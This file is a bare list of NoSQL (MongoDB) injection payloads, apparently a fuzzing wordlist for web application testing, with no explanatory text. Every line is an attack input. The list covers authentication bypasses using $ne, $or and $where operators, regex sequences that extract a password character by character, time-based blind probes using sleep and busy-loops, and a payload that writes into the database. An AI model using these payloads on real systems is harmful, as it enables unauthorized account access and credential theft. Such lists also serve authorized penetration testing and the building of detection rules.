";return(true);var xyz='a
$or: [ {}, { ‘a’: ‘a’, password: ‘’ }], $comment: ‘successful MongoDB injection’ }
$where: '1 == 1'
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
' || 'a'=='a
' } ], $comment:'successful MongoDB injection'
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
', $or: [ {}, { 'a':'a
', $where: '1 == 1'
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
';return 'a'=='a' && ''=='
';sleep(5000);
';sleep(5000);'
';sleep(5000);+'
, $where: '1 == 1'
0;return true
1, $where: '1 == 1'
admin' && this.password && this.password.match(/.*/)%00
admin' && this.password && this.password.match(/^a.*$/)%00
admin' && this.password && this.password.match(/^b.*$/)%00
admin' && this.password && this.password.match(/^c.*$/)%00
admin' && this.password && this.password.match(/^duvj.*$/)%00
admin' && this.password && this.password.match(/^duvj78i3u$/)%00
admin' && this.password%00
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
tolkien’, $or: [ {}, { ‘a’:’a&password=’ } ],$comment:’successful MongoDB injection'
true, $where: '1 == 1'
username[$eq]=admin&password[$ne]=1
username[$exists]=true&password[$exists]=true
username[$ne]=1$password[$ne]=1
username[$ne]=admin&pass[$gt]=s
username[$ne]=admin&pass[$lt]=s
username[$ne]=admin&password[$ne]=admin
username[$ne]=admin&password[$regex]=.{1}
username[$ne]=admin&password[$regex]=.{2}
username[$ne]=admin&password[$regex]=.{3}
username[$ne]=admin&password[$regex]=.{4}
username[$ne]=admin&password[$regex]=.{5}
username[$ne]=admin&password[$regex]=.{6}
username[$ne]=admin&password[$regex]=.{7}
username[$ne]=admin&password[$regex]=.{8}
username[$ne]=admin&password[$regex]=.{9}
username[$ne]=admin&password[$regex]=.{10}
username[$ne]=admin&password[$regex]=.{11}
username[$ne]=admin&password[$regex]=.{12}
username[$ne]=admin&password[$regex]=.{13}
username[$ne]=admin&password[$regex]=.{14}
username[$ne]=admin&password[$regex]=.{15}
username[$ne]=admin&password[$regex]=a.{2}
username[$ne]=admin&password[$regex]=b.{2}
username[$ne]=admin&password[$regex]=m.*
username[$ne]=admin&password[$regex]=m.{2}
username[$ne]=admin&password[$regex]=md.*
username[$ne]=admin&password[$regex]=md.{1}
username[$ne]=admin&password[$regex]=mdp
username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7
username[$regex]=.*&password[$regex]=.*
username[$regex]=.{25}&pass[$ne]=1
username[$regex]=^adm$password[$ne]=1
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
|| 1==1[$ne]=1
